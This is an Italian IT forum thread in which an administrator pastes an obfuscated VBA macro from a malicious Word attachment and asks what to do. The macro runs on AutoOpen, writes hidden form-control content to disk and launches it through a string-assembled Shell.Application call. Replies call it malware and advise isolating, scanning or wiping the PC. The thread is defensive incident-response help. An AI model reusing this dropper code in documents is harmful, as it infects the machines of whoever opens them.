none
File con macro sospetta: HELP! RRS feed

  • Domanda

  • Ciao a tutti,

    un utente della mia rete ha ricevuto un allegato sospetto, un doc compresso con all'interno una macro che non sono in grado di interpretare. Lui ha aperto il file e abilitato il contenuto protetto. Che fare?

    Incollo qui il testo della macro trovata:

    Function f3176f3a3()
    Set ff9617d3 = CreateObject("Scripting.FileSystemObject")
    f4b5a3883 = "f4181fec5" + "fb0c71aa" + "fb6bfc4c0"
    fd9a7d090 = Int((668586 - 3148 + 8) * Rnd + 5549)
    fe61c3066 = Fix(2474) + fd9a7d090
    f723e40e0 = Fix(fe61c3066) - Int(fd68ffb0f)
    If fe61c3066 > fd9a7d090 Then
       If fd9a7d090 < 0 Then
      MsgBox fe61c3066
    End If
    End If
    Set f43f68db3 = ff9617d3.CreateTextFile(dtjgekplmospe.Controls(1).Value, True)
    f2ec397a5 = "fe81434c7" + "f5e04fb" + "fef3669e5"
    f5d242d31 = Int((683287 - 9377 + 8) * Rnd + 1222)
    f1904a1ef = Fix(5068) + f5d242d31
    fcde5b588 = Fix(f1904a1ef) - Int(f8ad78e56)
    If f1904a1ef > f5d242d31 Then
       If f5d242d31 < 0 Then
      MsgBox f1904a1ef
    End If
    End If
    Set f711a4f71 = dtjgekplmospe.Controls(0)
    f9953a323 = "fe69de935" + "f5b0e10b4" + "ff0f5b3c0"
    fcb91afe4 = Int((512072 - 4649 + 7) * Rnd + 4339)
    faaf30d1e = Fix(3446) + fcb91afe4
    f294ba704 = Fix(faaf30d1e) - Int(f45be71c1)
    If faaf30d1e > fcb91afe4 Then
       If fcb91afe4 < 0 Then
      MsgBox faaf30d1e
    End If
    End If
    f43f68db3.WriteLine f711a4f71.Value
    f43f68db3.Close
    End Function
    Function fae49e6bb(f44f4d15e, f126f04b8)
    f711a4f71 = f126f04b8
    Set fb243c4ba = f44f4d15e
    fb243c4ba.Open f711a4f71
    End Function
    Sub AutoOpen()
    f3176f3a3
    fcadbd287
    End Sub
    Sub fcadbd287()
    Set fe662b7b = f4dfa32a3(f66c86b8d())
    Set f9c571fc4 = dtjgekplmospe.Controls(0 + 1)
    fae49e6bb fe662b7b, f9c571fc4.Value
    End Sub
    Function f4dfa32a3(f3624a587)
    Set f4dfa32a3 = CreateObject(f3624a587)
    End Function
    Function f66c86b8d()
    f13320292 = "fd5d67615" + "f67a43b14" + "f4a3c576"
    fd55efaf2 = Int((533913 - 1239 + 1) * Rnd + 7415)
    fe09c69ea = Fix(5714) + fd55efaf2
    f1ffcd88f = Fix(fe09c69ea) - Int(f17d97f86)
    If fe09c69ea > fd55efaf2 Then
       If fd55efaf2 < 0 Then
      MsgBox fe09c69ea
    End If
    End If
    f66c86b8d = feba47fe9() + ".applica" + "tion"
    End Function
    Function feba47fe9()
      feba47fe9 = Chr(115) + "h" + "ell"
    End Function
    
    

    Grazie, Lorenzo.

    venerdì 18 ottobre 2019 09:17

Risposte

  • E' un malware al 200% (una macro legittima non ha motivo di essere codificata in modo da sfuggire agli antivirus).

    Stacca il pc dalla rete, esegui scansione completissima e crocefiggi l'utente in sala mensa

    venerdì 18 ottobre 2019 09:57
  • Molti qui ti risponderanno che l'unico modo di essere sicuri è piallare completamente il PC.

    Io, personalmente, in casi di infezioni conclamate, dopo una pulizia completa da modalità provvisoria con DIVERSI antimalware di vari produttori (Malwarebytes e Emsisoft in primis), non ho avuto strascichi

    lunedì 21 ottobre 2019 09:32

Tutte le risposte

  • E' un malware al 200% (una macro legittima non ha motivo di essere codificata in modo da sfuggire agli antivirus).

    Stacca il pc dalla rete, esegui scansione completissima e crocefiggi l'utente in sala mensa

    venerdì 18 ottobre 2019 09:57
  • Si, non dubitavo!

    In principio ho fatto staccare il pc dalla rete. Poi ho effettuato scansione completa con Panda endpoint. Dice che è pulito.

    Mi fido? Ovviamente il PC dell'utente è sacrificabile. Il mio unico terrore sono i ransomware. 

    Grazie!

    venerdì 18 ottobre 2019 10:16
  • Molti qui ti risponderanno che l'unico modo di essere sicuri è piallare completamente il PC.

    Io, personalmente, in casi di infezioni conclamate, dopo una pulizia completa da modalità provvisoria con DIVERSI antimalware di vari produttori (Malwarebytes e Emsisoft in primis), non ho avuto strascichi

    lunedì 21 ottobre 2019 09:32
  • Grazie, alla prossima.
    martedì 22 ottobre 2019 13:31